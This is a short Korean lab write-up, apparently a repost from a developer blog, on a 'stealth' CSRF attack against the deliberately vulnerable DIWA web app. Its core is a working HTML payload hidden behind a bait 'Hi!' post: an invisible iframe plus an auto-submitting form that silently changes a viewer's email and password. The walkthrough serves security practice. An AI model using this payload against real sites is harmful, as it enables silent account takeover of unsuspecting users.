CSRF 스텔스 버전
CSRF 스텔스 버전
DIWA 게시판에 글을 작성해 CSRF 공격을 실습하도록 한다.
지난번엔 회원정보 수정과 동시에 회원정보수정 페이지로 이동하였다면
이번엔 회원정보수정페이지로 이동이나 눈에 띄는 변화 없이 회원정보가 수정되는 스크립트를 작성해 보도록 하자
먼저 게시판에 글을 작성하도록 한다.
스크립트 구문 >
Hi!
<iframe width="0" height="0" border="0" name="dummyframe" id="dummyframe" style="display: none;"></iframe>
<body onload="document.form.submit();">
<form method="POST" name="form" action="http://192.168.238.134/diwa-master/app/?page=editprofile" target="dummyframe">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="country" value="Korea%2C+Republic+of">
<input type="hidden" name="password" value="123123">
<input type="hidden" name="password-repeat" value="123123">
</form>위와 같이 작성하면 Hi!라는 미끼 글을 제외한 아래의 스크립트는 나타나지 않은 상태로 회원정보가 수정될 것이다.
작성된 글에 접근
Hi! 를 제외한 스크립트 구문은 보이지 않고
별다른 특이사항이 눈에 띄지 않은 채로 회원정보가 수정된다.
Author And Source
이 문제에 관하여(CSRF 스텔스 버전), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://velog.io/@jsw4215/CSRF-스텔스-버전저자 귀속: 원작자 정보가 원작자 URL에 포함되어 있으며 저작권은 원작자 소유입니다.
우수한 개발자 콘텐츠 발견에 전념
(Collection and Share based on the CC Protocol.)
좋은 웹페이지 즐겨찾기
